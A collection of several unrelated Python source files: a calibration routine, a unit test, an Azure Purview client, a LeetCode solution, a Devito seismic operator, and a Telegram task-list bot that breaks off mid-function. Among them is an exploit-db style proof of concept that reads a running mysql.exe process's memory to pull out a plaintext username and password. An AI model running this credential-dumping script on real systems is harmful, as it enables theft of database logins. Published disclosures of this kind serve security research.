            # allclose returns False both when any value is NaN and when the
            # numerical values differ, which is the desired behavior here
out[location]["equal"] = np.allclose(
values,
np.nanmedian(values)
)
return out
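# Example of how the result above is typically consumed (added commentary; the
# variable names are illustrative only):
#     status = _check_stored_calibrations(df_filtered)
#     if status["near"]["any"] and not status["near"]["equal"]:
#         ...  # stored near-field calibrations disagree; re-measure or pick one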
class SpatialCalibration:
@staticmethod
def collect(
date,
loc_processed_data,
loc_schlieren_measurements,
raise_if_no_measurements=True
):
with pd.HDFStore(loc_processed_data, "r") as store_pp:
# make sure date is in post-processed data
if date not in store_pp.data["date"].unique():
e_str = "date {:s} not in {:s}".format(
date,
loc_processed_data
)
raise ValueError(e_str)
else:
df_dirs = store_pp.data[
store_pp.data["date"] == date
][["shot", "spatial"]]
df_dirs.columns = ["shot", "dir"]
df_dirs["dir"] = df_dirs["dir"].apply(
convert_dir_to_local
)
with pd.HDFStore(loc_schlieren_measurements, "r+") as store_sc:
df_sc = store_sc.data[
store_sc.data["date"] == date
]
if len(df_sc) == 0 and raise_if_no_measurements:
e_str = "no measurements found for %s" % date
raise ValueError(e_str)
# collect calibrations
df_daily_cal = pd.DataFrame([dict(
dir=k,
near=un.ufloat(np.NaN, np.NaN),
far=un.ufloat(np.NaN, np.NaN),
) for k in df_dirs["dir"].unique()]).set_index("dir")
desired_cals = ["near", "far"]
successful_cals = []
for d, row in df_daily_cal.iterrows():
for which in desired_cals:
pth_tif = os.path.join(str(d), which + ".tif")
if os.path.exists(pth_tif):
df_daily_cal.at[
d,
which
] = collect_spatial_calibration(pth_tif)
successful_cals.append(which)
# apply calibrations
for _, row in df_dirs.iterrows():
row_mask = df_sc["shot"] == row["shot"]
# set near and far spatial calibrations
for which in successful_cals:
key = "spatial_" + which
df_sc[key] = np.where(
row_mask,
df_daily_cal.loc[row["dir"], which].nominal_value,
df_sc[key]
)
key = "u_" + key
df_sc[key] = np.where(
row_mask,
df_daily_cal.loc[row["dir"], which].std_dev,
df_sc[key]
)
df_sc["spatial_" + which + "_estimated"] = False
# calculate and set centerline calibration
centerline = np.mean(
[unp.uarray(df_sc["spatial_near"], df_sc["u_spatial_near"]),
unp.uarray(df_sc["spatial_far"], df_sc["u_spatial_far"])],
axis=0
)
df_sc["spatial_centerline"] = np.where(
row_mask,
unp.nominal_values(centerline),
df_sc["spatial_centerline"]
)
df_sc["u_spatial_centerline"] = np.where(
row_mask,
unp.std_devs(centerline),
df_sc["u_spatial_centerline"]
)
df_out = store_sc.data
df_out.loc[df_out["date"] == date] = df_sc
store_sc.put("data", df_out)
|
# Copyright (c) 2021 Princeton University
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import unittest
sys.path.insert(1, '../..')
from synthetic_workload_invoker.EventGenerator import *
class TestEventGenerator(unittest.TestCase):
def test_CreateEvents(self):
inter_arrivals = CreateEvents(instance=0, dist='Uniform', rate=1, duration=5, seed=100)
self.assertEqual(inter_arrivals[1:], [1.0, 1.0, 1.0, 1.0])
def test_EnforceActivityWindow(self):
event_iit = EnforceActivityWindow(start_time=1.5, end_time=3.5,
instance_events=[1.0, 1.0, 1.0, 1.0])
self.assertEqual(event_iit, [2.0, 1.0])
if __name__ == '__main__':
unittest.main() |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import TYPE_CHECKING
from azure.core import PipelineClient
from azure.purview.catalog.core.rest import HttpResponse, _StreamContextManager
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Dict
from azure.core.credentials import TokenCredential
from azure.purview.catalog.core.rest import HttpRequest
from ._configuration import PurviewCatalogClientConfiguration
class PurviewCatalogClient(object):
"""Purview Catalog Service is a fully managed cloud service whose users can discover the data sources they need and understand the data sources they find. At the same time, Data Catalog helps organizations get more value from their existing investments. This spec defines REST API of Purview Catalog Service.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
:param endpoint: The catalog endpoint of your Purview account. Example: https://{accountName}.catalog.purview.azure.com.
:type endpoint: str
"""
def __init__(
self,
credential, # type: "TokenCredential"
endpoint, # type: str
**kwargs # type: Any
):
# type: (...) -> None
base_url = '{Endpoint}/api'
self._config = PurviewCatalogClientConfiguration(credential, endpoint, **kwargs)
self._client = PipelineClient(base_url=base_url, config=self._config, **kwargs)
self._serialize = Serializer()
self._deserialize = Deserializer()
self._serialize.client_side_validation = False
def send_request(self, http_request, **kwargs):
# type: (HttpRequest, Any) -> HttpResponse
"""Runs the network request through the client's chained policies.
We have helper methods to create requests specific to this service in `azure.purview.catalog.rest`.
Use these helper methods to create the request you pass to this method. See our example below:
>>> from azure.purview.catalog.rest import build_create_or_update_request
>>> request = build_create_or_update_request(json, content)
<HttpRequest [POST], url: '/atlas/v2/entity'>
>>> response = client.send_request(request)
<HttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
For advanced cases, you can also create your own :class:`~azure.purview.catalog.core.rest.HttpRequest`
and pass it in.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.purview.catalog.core.rest.HttpRequest
:keyword bool stream_response: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.purview.catalog.core.rest.HttpResponse
"""
request_copy = deepcopy(http_request)
path_format_arguments = {
'Endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request_copy.url = self._client.format_url(request_copy.url, **path_format_arguments)
if kwargs.pop("stream_response", False):
return _StreamContextManager(
client=self._client._pipeline,
request=request_copy,
)
pipeline_response = self._client._pipeline.run(request_copy._internal_request, **kwargs)
response = HttpResponse(
status_code=pipeline_response.http_response.status_code,
request=request_copy,
_internal_response=pipeline_response.http_response
)
response.read()
return response
def close(self):
# type: () -> None
self._client.close()
def __enter__(self):
# type: () -> PurviewCatalogClient
self._client.__enter__()
return self
def __exit__(self, *exc_details):
# type: (Any) -> None
self._client.__exit__(*exc_details)
|
class Solution:
def canPlaceFlowers(self, pos, n):
pos = [0] + pos + [0]
for i in range(1, len(pos)-1):
if n == 0: return True
if not (pos[i] or pos[i-1] or pos[i+1]):
pos[i] = 1
n -= 1
return n == 0
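# Quick illustrative check (added; not part of the original solution). The
# method pads the bed with a zero on each side so the edges need no special
# casing, then plants greedily wherever plot i and both neighbours are empty.
if __name__ == "__main__":  # pragma: no cover
    assert Solution().canPlaceFlowers([1, 0, 0, 0, 1], 1)
    assert not Solution().canPlaceFlowers([1, 0, 0, 0, 1], 2)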
|
from devito import Eq, Operator, TimeFunction, left, right, staggered_diff
from examples.seismic import PointSource, Receiver
def ForwardOperator(model, source, receiver, space_order=4,
save=False, **kwargs):
"""
Constructor method for the forward modelling operator in an elastic media
:param model: :class:`Model` object containing the physical parameters
:param source: :class:`PointData` object containing the source geometry
:param receiver: :class:`PointData` object containing the acquisition geometry
:param space_order: Space discretization order
:param save: Saving flag, True saves all time steps, False only the three buffered
indices (last three time steps)
"""
vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
s = model.grid.stepping_dim.spacing
x, z = model.grid.dimensions
cp2 = vp*vp
cs2 = vs*vs
ro = 1/rho
mu = cs2*rho
l = rho*(cp2 - 2*cs2)
# Create symbols for forward wavefield, source and receivers
vx = TimeFunction(name='vx', grid=model.grid, staggered=(0, 1, 0),
save=source.nt if save else None,
time_order=2, space_order=space_order)
vz = TimeFunction(name='vz', grid=model.grid, staggered=(0, 0, 1),
save=source.nt if save else None,
time_order=2, space_order=space_order)
txx = TimeFunction(name='txx', grid=model.grid,
save=source.nt if save else None,
time_order=2, space_order=space_order)
tzz = TimeFunction(name='tzz', grid=model.grid,
save=source.nt if save else None,
time_order=2, space_order=space_order)
txz = TimeFunction(name='txz', grid=model.grid, staggered=(0, 1, 1),
save=source.nt if save else None,
time_order=2, space_order=space_order)
# Source symbol with input wavelet
src = PointSource(name='src', grid=model.grid, time_range=source.time_range,
npoint=source.npoint)
rec1 = Receiver(name='rec1', grid=model.grid, time_range=receiver.time_range,
npoint=receiver.npoint)
rec2 = Receiver(name='rec2', grid=model.grid, time_range=receiver.time_range,
npoint=receiver.npoint)
# Stencils
fd_vx = (staggered_diff(txx, dim=x, order=space_order, stagger=left) +
staggered_diff(txz, dim=z, order=space_order, stagger=right))
u_vx = Eq(vx.forward, damp * vx - damp * s * ro * fd_vx)
fd_vz = (staggered_diff(txz, dim=x, order=space_order, stagger=right) +
staggered_diff(tzz, dim=z, order=space_order, stagger=left))
u_vz = Eq(vz.forward, damp * vz - damp * ro * s * fd_vz)
vxdx = staggered_diff(vx.forward, dim=x, order=space_order, stagger=right)
vzdz = staggered_diff(vz.forward, dim=z, order=space_order, stagger=right)
u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vxdx
- damp * l * s * vzdz)
u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vzdz
- damp * l * s * vxdx)
vxdz = staggered_diff(vx.forward, dim=z, order=space_order, stagger=left)
vzdx = staggered_diff(vz.forward, dim=x, order=space_order, stagger=left)
u_txz = Eq(txz.forward, damp * txz - damp * mu*s * (vxdz + vzdx))
# The source injection term
src_xx = src.inject(field=txx.forward, expr=src * s, offset=model.nbpml)
src_zz = src.inject(field=tzz.forward, expr=src * s, offset=model.nbpml)
# Create interpolation expression for receivers
rec_term1 = rec1.interpolate(expr=txx, offset=model.nbpml)
rec_term2 = rec2.interpolate(expr=tzz, offset=model.nbpml)
# Substitute spacing terms to reduce flops
return Operator([u_vx, u_vz, u_txx, u_tzz, u_txz] + src_xx + src_zz
+ rec_term1 + rec_term2, subs=model.spacing_map,
name='Forward', **kwargs)
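# Added commentary (not part of the original file): the stencils above form a
# 2D velocity-stress staggered-grid scheme. In continuous form they integrate
#   rho * dv/dt = div(tau),   dtau/dt = l * (div v) * I + mu * (grad v + grad v^T),
# where l and mu are the Lame parameters and `damp` applies the absorbing
# boundary taper to every update.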
|
#####
# MySQL 5.5.45 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.mysql.com
# Date 05/09/2016
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
#
# http://www.black-rose.ml
# Source Code for the executable attached
# Special Thanks & Greetings to Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#####
# MySQL v5.5.45 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in the process memory.
# A potential attacker could reveal the supplied username and password in order to gain access to the database.
# Proof-Of-Concept Code:
#####
import time
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
count = 0
filename = "mysql.exe"
process_pid = 0
memory_dump = []
passwd = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
    if process_pid != 0:
print "[+] Found process pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
memory_dump.append(process.read(address,30))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
last = first.split(" 00 2D 70")
if last[0]:
usr = h2b(last[0])
memory_dump = []
for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,100))
sorted(set(memory_dump))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
string = str.split('00 8F')
for x in range(len(string)):
if x == 1:
passwd = string
try:
pwd = h2b(passwd[1].split('00 00')[0])
except:
pass
print "[~] Trying to extract credentials from memory.."
time.sleep(1)
if usr != '' and pwd != '':
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
else:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'" % (filename)
debug.loop()
finally:
debug.stop()
|
import os
import re
import sys
import json
import socket
import sqlite3
import logging
import datetime
import telegram
from time import sleep
from src.chrono import Chrono
from src.command import Task
from src.command import Command
from src.utils import get_api_token
from src.simple_parser import Parser
from telegram.error import NetworkError, Unauthorized
api_token = ''
if not api_token: api_token = get_api_token()
#########
# SETUP #
#########
logging.basicConfig(level=logging.WARNING, format='%(asctime)s %(levelname)s [%(module)s]: %(message)s')
logger = logging.getLogger(__name__)
logger.addHandler(logging.FileHandler('log.log', 'w', 'utf-8'))
update_id = None
conn = sqlite3.connect('database.db')
c = conn.cursor()
parser = Parser()
chrono = Chrono()
valid_undo_commands = ['ADD', 'DEL', 'APPEND', 'EDIT', 'ADD_RECUR', 'DEL_RECUR']
recurring_list_commands = ['LIST_RECUR', 'DEL_RECUR']
weekday_integer_list = {'mon':1, 'tue':2, 'wed':3, 'thu':4, 'fri':5, 'sat':6, 'sun':7}
TASK_NUMBER_LIMIT = 20
INVALID_COMMAND_MULTI = 'Whoops! You can only use multiple lines for the "<b>ADD</b>" command. The "<b>{}</b>" command is not allowed in conjunction with other commands.'
INVALID_COMMAND_MYTIME = 'Not enough information to calculate your timezone!'
INVALID_COMMAND_GENERAL = 'Invalid Command Haha! See /help.'
INVALID_COMMAND_INDEX = 'Task {} is out of list range!'
INVALID_COMMAND_APPEND = 'Nothing to append!'
INVALID_COMMAND_UNDO = 'No more undos!'
NOTIFICATION_DEL = '<b>(Deleted!)</b> {}'
NOTIFICATION_MYTIME = 'Your timezone has been calculated and stored!'
COMMAND_LIST_PASS = ['LIST', 'START', 'LIST_FULL', 'LIST_RECUR', 'HELP']
##################
# MAIN FUNCTIONS #
##################
def main():
global update_id
logger.warning('(1/3) Loading bot...')
bot = get_bot(api_token)
update_id = get_update_id(bot)
logger.warning('(2/3) Loading database...')
db_init()
logger.warning('(3/3) Bot ready.')
#send('Recipebot has been activated.', 302383988, bot)
while True:
try:
handle_updates(bot)
except NetworkError:
sleep(1)
except Unauthorized:
update_id += 1
except Exception as e:
logger.error('Exception {}'.format(str(e)))
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
#print(exc_type, fname, exc_tb.tb_lineno)
sleep(1)
def handle_updates(bot):
global update_id
for update in bot.get_updates(offset=update_id, timeout=10):
update_id = update.update_id + 1
if update.message:
m = update.message
elif update.edited_message:
m = update.edited_message
else:
continue
logger.info('{}: {}'.format(m.chat_id, m.text))
reply = get_reply(m.text, m.chat_id)
logger.info('Reply:{}'.format(reply))
send(reply, m.chat_id, bot)
def get_reply(text, id):
global parser
logger.debug('get_reply started')
    if id not in db_get_users_list():
db_add_user(id)
return set_timezone_message
command_list = []
additional_message_list = []
utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
try:
for line in text.split('\n'):
command = parser.getCommand(line, utc_diff_in_seconds)
command_list.append(command)
check_valid_multiple_line_command(command_list)
for command in command_list:
execute(command, id, additional_message_list)
except Exception as e:
logger.error('Exception: {}'.format(str(e)))
return str(e)
db_add_task_recurring_n_day_only(id)
message = generate_main_message(id, command_list[0], utc_diff_in_seconds)
message = attach(additional_message_list, message, id, command_list[0])
db_save()
logger.debug('get_reply ended')
return message
######################
# DATABASE FUNCTIONS #
######################
def db_init():
c.execute('CREATE TABLE IF NOT EXISTS users(id INTEGER, UTCDiffInSeconds INTEGER)')
c.execute('CREATE TABLE IF NOT EXISTS tasks(id INTEGER, name TEXT, date INTEGER, time INTEGER, location TEXT, linkListSerial TEXT, important INTEGER, new INTEGER)')
c.execute('CREATE TABLE IF NOT EXISTS tasks_recurring(id INTEGER, name TEXT, date INTEGER, time INTEGER, location TEXT, linkListSerial TEXT, important INTEGER, new INTEGER, recurringString TEXT, recurringInteger INTEGER)')
conn.commit()
def db_get_users_list():
temp = []
c.execute('SELECT id FROM users')
for row in c.fetchall():
temp.append(row[0])
return temp
def db_add_user(id, defaultDiffInSeconds = 28800):
c.execute('INSERT INTO users (id, UTCDiffInSeconds) VALUES (?,?)', (id, defaultDiffInSeconds))
def db_get_utc_diff_in_seconds(id):
c.execute('SELECT UTCDiffInSeconds FROM users WHERE id = (?)', (id,))
return c.fetchall()[0][0]
def db_change_utc_diff_in_seconds(id, UTCDiffInSeconds):
db_undo_clear(id)
c.execute('UPDATE users SET UTCDiffInSeconds = (?) WHERE id = (?)', (UTCDiffInSeconds, id))
conn.commit()
#0-id INTEGER
#1-name TEXT
#2-date INTEGER
#3-time INTEGER
#4-location TEXT
#5-linkListSerial TEXT
#6-important INTEGER
#7-new INTEGER
def db_get_tasklist(id):
tasklist = []
c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
for row in c.fetchall():
tasklist.append(Task(name = row[1], date = row[2], time = row[3], location = row[4], linkList = json.loads(row[5]), important = row[6], new = row[7]))
c.execute('UPDATE tasks SET new = 0 WHERE id = (?)', (id,))
return tasklist
#0-id INTEGER
#1-name TEXT
#2-date INTEGER
#3-time INTEGER
#4-location TEXT
#5-linkListSerial TEXT
#6-important INTEGER
#7-new INTEGER
#8-recurringString TEXT
#9-recurringInteger INTEGER
def db_get_recurring_tasklist(id):
tasklist = []
c.execute('SELECT * FROM tasks_recurring WHERE id = (?) ORDER BY recurringString, substr(date,5,2)||recurringInteger', (id,))
for row in c.fetchall():
tasklist.append(Task(name = row[1], date = row[2], time = row[3], location = row[4], linkList = json.loads(row[5]), important = row[6], new = row[7], recurringString = row[8], recurringInteger = row[9]))
return tasklist
def db_add_task(task, id):
db_undo_save(id)
c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', (id, task.name, task.date, task.time, task.location, json.dumps(task.linkList), task.important, task.new))
def db_add_task_diff_date(task, id, diff_date):
c.execute('SELECT * FROM tasks WHERE (id, name, date, time, location, linkListSerial, important) = (?,?,?,?,?,?,?)', (id, task.name, diff_date, task.time, task.location, json.dumps(task.linkList), task.important))
if not c.fetchall():
c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', (id, task.name, diff_date, task.time, task.location, json.dumps(task.linkList), task.important, task.new))
def db_add_task_recurring(task, id):
db_undo_clear(id)
c.execute('INSERT INTO tasks_recurring (id, name, date, time, location, linkListSerial, important, new, recurringString, recurringInteger) VALUES (?,?,?,?,?,?,?,?,?,?)', (id, task.name, task.date, task.time, task.location, json.dumps(task.linkList), task.important, task.new, task.recurringString, task.recurringInteger))
def db_delete_task(number_or_task, id):
db_undo_save(id)
if isinstance(number_or_task, int):
c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
try: task_tuple = c.fetchall()[number_or_task - 1]
except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number_or_task))
else:
task_tuple = (id, number_or_task.name, number_or_task.date, number_or_task.time, number_or_task.location, json.dumps(number_or_task.linkList), number_or_task.important, number_or_task.new)
c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
return Task(name = task_tuple[1], date = task_tuple[2], time = task_tuple[3], location = task_tuple[4], linkList = json.loads(task_tuple[5]), important = task_tuple[6], new = task_tuple[7])
def db_delete_task_recurring(number, id):
db_undo_clear(id)
c.execute('SELECT * FROM tasks_recurring WHERE id = (?) ORDER BY recurringString, substr(date,5,2)||recurringInteger', (id,))
try: task_tuple = c.fetchall()[number - 1]
except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
c.execute('DELETE FROM tasks_recurring WHERE rowid = (SELECT rowid FROM tasks_recurring WHERE (id, name, date, time, location, linkListSerial, important, new, recurringString, recurringInteger) = (?,?,?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
c.execute('DELETE FROM tasks WHERE (id, name, time, location, linkListSerial, important) = (?,?,?,?,?,?)', task_tuple[:2] + task_tuple[3:-3])
def db_get_task(number, id):
c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
try: task_tuple = c.fetchall()[number - 1]
except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
return Task(name = task_tuple[1], date = task_tuple[2], time = task_tuple[3], location = task_tuple[4], linkList = json.loads(task_tuple[5]), important = task_tuple[6], new = task_tuple[7])
def db_append_task(number, id, append_task):
db_undo_save(id)
c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
try: task_tuple = c.fetchall()[number - 1]
except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
new_name = task_tuple[1]
new_location = task_tuple[4]
new_linkList = json.loads(task_tuple[5])
if append_task.name: new_name = '{}, {}'.format(new_name, append_task.name)
if append_task.location: new_location = '{}/{}'.format(new_location, append_task.location)
if append_task.linkList: new_linkList = new_linkList + append_task.linkList
new_new = 1
    new_task_tuple = (id, new_name, task_tuple[2], task_tuple[3], new_location, json.dumps(new_linkList), task_tuple[6], new_new)  # task_tuple[6] is the stored "important" flag
c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', new_task_tuple)
def db_append_task_with_another_tasks(id, numberList):
db_undo_save(id)
append_task = db_get_task(numberList[1], id)
db_append_task(numberList[0], id, append_task)
db_delete_task(append_task, id)
def db_edit_task(number, id, edit_task):
db_undo_save(id)
c.execute('SELECT * FROM tasks WHERE id = (?) ORDER BY date, time', (id,))
try: task_tuple = c.fetchall()[number - 1]
except IndexError: raise Exception(INVALID_COMMAND_INDEX.format(number))
c.execute('DELETE FROM tasks WHERE rowid = (SELECT rowid FROM tasks WHERE (id, name, date, time, location, linkListSerial, important, new) = (?,?,?,?,?,?,?,?) LIMIT 1)', task_tuple)
task_listed = list(task_tuple)
if edit_task.name: task_listed[1] = edit_task.name
if edit_task.date != 0: task_listed[2] = edit_task.date
if edit_task.time != -1: task_listed[3] = edit_task.time
if edit_task.location != '': task_listed[4] = edit_task.location
if edit_task.linkList: task_listed[5] = json.dumps(edit_task.linkList)
if edit_task.important != 0: task_listed[6] = edit_task.important
task_listed[7] = 1
c.execute('INSERT INTO tasks (id, name, date, time, location, linkListSerial, important, new) VALUES (?,?,?,?,?,?,?,?)', tuple(task_listed))
def db_add_task_recurring_next_n_days(id, task, n = 14):
utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
current_time_delta = Chrono.getCurrentTimeDelta(utc_diff_in_seconds)
for i in range(n + 1):
target_time_delta = current_time_delta + datetime.timedelta(days = i)
target_date_number = chrono.getDateNumberFromTimeDelta(target_time_delta)
month_number = int(target_time_delta.strftime('%m'))
day_of_month_number = int(target_time_delta.strftime('%d'))
day_of_week_string = target_time_delta.strftime('%a').lower()
if task.recurringString == 'every_year' and task.recurringInteger == day_of_month_number and (task.date // 100 % 100) == month_number: db_add_task_diff_date(task, id, target_date_number)
elif task.recurringString == 'every_month' and task.recurringInteger == day_of_month_number: db_add_task_diff_date(task, id, target_date_number)
elif task.recurringString[6:] == day_of_week_string: db_add_task_diff_date(task, id, target_date_number)
def db_add_task_recurring_n_day_only(id, n = 14):
utc_diff_in_seconds = db_get_utc_diff_in_seconds(id)
current_time_delta = Chrono.getCurrentTimeDelta(utc_diff_in_seconds)
recurring_tasklist = db_get_recurring_tasklist(id)
i = n
target_time_delta = current_time_delta + datetime.timedelta(days = i)
target_date_number = chrono.getDateNumberFromTimeDelta(target_time_delta)
month_number = int(target_time_delta.strftime('%m'))
day_of_month_number = int(target_time_delta.strftime('%d'))
day_of_week_string = target_time_delta.strftime('%a').lower()
for task in recurring_tasklist:
if task.recurringString == 'every_year' and task.recurringInteger == day_of_month_number and (task.date // 100 % 100) == month_number: db_add_task_diff_date(task, id, target_date_number)
elif task.recurringString == 'every_month' and task.recurringInteger == day_of_month_number: db_add_task_diff_date(task, id, target_date_number)
elif task.recurringString[6:] == day_of_week_string: db_add_task_diff_date(task, id, target_date_number)
def db_undo(id):
c.execute('SELECT * FROM tasks WHERE id = (?)', (id + 1000000000,))
if not c.fetchall(): raise Exception(INVALID_COMMAND_UNDO)
c.execute('DELETE FROM tasks WHERE id = (?)', (id,))
c.execute('UPDATE tasks SET id = (?) WHERE id = (?)', (id, id + 1000000000))
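# Note on the undo scheme (added commentary): a single undo level is kept by
# mirroring a user's tasks under the shadow id (id + 1000000000) before each
# mutating command; db_undo() deletes the live rows and renames the shadow
# copy back, so only the most recent change can be reverted.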
def db_undo_save(id):
# delete previous undo save
c.execute('DELETE FROM tasks WHERE id = (?)', (id + 1000000000,))
# copy current tasks under modified id
c.execute('INSERT INTO tasks SELECT (id + 1000000000) AS id, name, date, time, location, linkListSerial, important, new FROM tasks WHERE id = (?)', (id,))
# c.execute('SELECT * FROM tasks WHERE id = (?)', (id + 1000000000,))
# for row in c.fetchall():
# print(row)
def db_undo_clear(id):
c.execute('DELETE FROM tasks WHERE id = (?)', (id + 1000000000,))
def db_save():
conn.commit()
####################
# HELPER FUNCTIONS #
####################
def get_bot(api_token):
    if api_token == 'insert_your_api_token_here': assert 0, 'Please add your Telegram Bot api token into run.py'
while True:
try:
try:
print('Trying to get_bot...')
bot = telegram.Bot(api_token)
return bot
except socket.timeout:
#logger.error('exception', str(e))
sleep(2)
pass
except Exception as e:
            logger.error('exception: %s', str(e))
sleep(2)
pass
def get_update_id(bot):
try:
update_id = bot.get_updates()[0].update_id
return update_id
except IndexError:
return None
def send(message, id, bot):
bot.send_chat_action(chat_id=id, action=telegram.ChatAction.TYPING)
bot.send_message(chat_id=id, text=message, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=1)
def check_valid_multiple_line_command(command_list):
if len(command_list) < 2:
return
for command in command_list:
command_type = command.commandType
        if command_type not in ['ADD', 'ADD_RECUR']:
raise Exception(INVALID_COMMAND_MULTI.format(command_type))
def execute(command, id, messageList):
logger.debug('execute started')
commandType = command.commandType
numberList = command.numberList
if commandType in COMMAND_LIST_PASS: pass
elif commandType == 'ADD': db_add_task(command.task, id)
elif commandType == 'DEL':
for number in numberList:
deletedTask = db_delete_task(number, id)
messageList.append(NOTIFICATION_DEL.format(deletedTask.getName()))
elif commandType == 'ADD_RECUR':
db_add_task_recurring(command.task, id)
db_add_task_recurring_next_n_days(id, command.task)
elif commandType == 'DEL_RECUR': db_delete_task_recurring(numberList[0], id)
elif commandType == 'APPEND':
print(command.task.name)
print(command.task.location)
print(command.task.linkList)
if not command.task.name and not command.task.location and not command.task.linkList: raise Exception(INVALID_COMMAND_APPEND)
else:
if len(numberList) > 1 and len(command.task.name.split()) == 1: db_append_task_with_another_tasks(id, numberList)
else: db_append_task(numberList[0], id, command.task)
elif commandType == 'SEARCH': pass
elif commandType == 'UNDO': db_undo(id)
elif commandType == 'EDIT': db_edit_task(numberList[0], id, command.task)
elif commandType == 'MYTIME':
if command.task.time == -1 or command.task.date == 0: raise Exception(INVALID_COMMAND_MYTIME)
else:
UTCDiffInSeconds = chrono.getUTCDiffInSeconds(command.task.time, command.task.date)
db_change_utc_diff_in_seconds(id, UTCDiffInSeconds)
messageList.append(NOTIFICATION_MYTIME)
elif commandType == 'CLEAR': raise Exception('Clear command coming soon!')
elif commandType == 'REDO': raise Exception('Redo command coming soon!')
else: raise Exception(INVALID_COMMAND_GENERAL)
logger.debug('execute ended')
def generate_main_message(id, command, UTCDiffInSeconds):
logger.debug('Generate tasklist_string started')
tasklist_string = ''
search_mode = 0
search_found = 0
search_task = command.task
full_list_mode = 0
recur_list_mode = 0
today_bar_exists = 0
end_of_week_bar_exists = 0
end_of_week_bar_needed = 0
if command.commandType == 'SEARCH': search_mode = 1
elif command.commandType == 'HELP': return welcome_message_string
elif command.commandType == 'START': return set_timezone_message
elif command.commandType == 'LIST_FULL': full_list_mode = 1
elif command.commandType in recurring_list_commands: recur_list_mode = 1
if search_mode:
tasklist = db_get_tasklist(id)
for i, task in enumerate(tasklist):
if task_match(task, search_task):
search_found = 1
tasklist_string = '{}<b>{}</b>. {} {}{}{}{}{}\n'.format(tasklist_string, str(i + 1), chrono.getNiceDate(task.date, UTCDiffInSeconds), task.getTime(), bold_term(task.getName(), search_task.name), task.getLocation(), get_link_string(task.linkList, 'full'), task.getImportant())
if not search_found:
tasklist_string = '{}No entries match your search :(\n'.format(tasklist_string)
elif recur_list_mode:
recurringtasklist = db_get_recurring_tasklist(id)
if not len(recurringtasklist): return 'No recurring tasks added yet!\n'
for i, task in enumerate(recurringtasklist):
tasklist_string = '{}<b>{}</b>. {}{} (<b>{}</b>)/Del_R{}\n'.format(tasklist_string, i + 1, task.name, task.getImportant(), get_nice_recurring_date(task), i + 1)
else:
tasklist = db_get_tasklist(id)
if not len(tasklist): return empty_tasklist_string
todayDelta = chrono.getCurrentTimeDelta(UTCDiffInSeconds)
todayDateNumber = chrono.getDateNumberFromTimeDelta(todayDelta)
